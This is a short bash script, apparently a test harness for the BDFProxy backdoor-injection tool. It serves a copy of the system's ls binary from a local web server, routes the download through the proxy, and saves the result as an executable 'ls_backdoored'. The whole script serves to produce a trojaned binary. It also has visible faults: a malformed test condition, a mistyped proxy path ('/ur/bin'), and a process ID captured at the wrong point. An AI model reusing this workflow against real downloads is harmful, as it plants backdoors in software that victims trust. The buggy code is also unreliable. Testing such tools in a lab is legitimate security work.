1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
|
#!/usr/bin/env bash
# This script configures a simple local python webserver
# and downloads $(which ls) from it through BDF proxy.
# figure out python executable (especially relevant on arch linux)
if [ $(which python2.7) ]
then
PYTHON=python2.7
elif [$(which python2) ]
then
PYTHON=python2
else
PYTHON=python
fi
# start up the server
echo "[*] Starting up a webserver to serve /tmp"
cd /tmp
$PYTHON -m SimpleHTTPServer 9001 &
SERVER_PID=$!
cd -
echo "[*] Making a backup copy of config"
cp /etc/bdfproxy/bdfproxy.cfg bdfproxy.cfg
echo "[*] Patching config to turn off transparentProxy"
sed -i 's/^transparentProxy.\+/transparentProxy = False/' bdfproxy.cfg
# start the proxy
echo "[*] Starting"
$PYTHON /ur/bin/bdf_proxy &
sleep 5
PROXY_PID=$!
echo "[*] Copying "$(which ls)" to /tmp"
cp $(which ls) /tmp
echo "[*] Attempting to download a backdoored version of "$(which ls)" to $(pwd)/ls_backdoored"
curl 'http://localhost:9001/ls' --proxy1.0 localhost:8080 > ls_backdoored
echo "[*] Shutting down"
kill $SERVER_PID
kill $PROXY_PID
echo "[*] Cleaning up temporary files"
rm -f /tmp/ls
rm bdfproxy.cfg
echo "[*] ls_backdoored is available for testing in" $(pwd)
chmod +x ls_backdoored
|
